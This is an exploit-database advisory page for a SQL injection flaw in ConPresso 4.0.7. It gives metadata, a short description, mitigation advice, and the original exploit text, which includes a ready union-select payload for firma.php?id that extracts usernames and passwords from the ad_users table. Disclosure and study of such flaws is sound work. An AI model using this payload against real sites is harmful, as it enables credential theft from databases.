ConPresso 4.0.7 SQL Injection Vulnerability

vendor:

ConPresso

by:

Gamoscu

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ConPresso

Affected Version From: 4.0.7

Affected Version To: 4.0.7

Patch Exists: No

Related CWE: N/A

CPE: a:conpresso:conpresso:4.0.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

ConPresso 4.0.7 SQL Injection Vulnerability

ConPresso 4.0.7 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter 'id' in the 'firma.php' file. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

ConPresso 4.0.7 SQL Injection  Vulnerability  
    
########################### 
    
Author    : Gamoscu  
Homepage  : http://www.1923turk.com  
Blog      : http://gamoscu.wordpress.com/  
Script    : ConPresso 4.0.7 
Download  : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
    
###########################   
      
[ Vulnerable File ] 
  
firma.php?id= [ SQL ] 
       
  
[ XpL ] 
    
-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users 
  
  
    

iyi ki dogdun DELiBEY

     
##############################################################   
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO   
##############################################################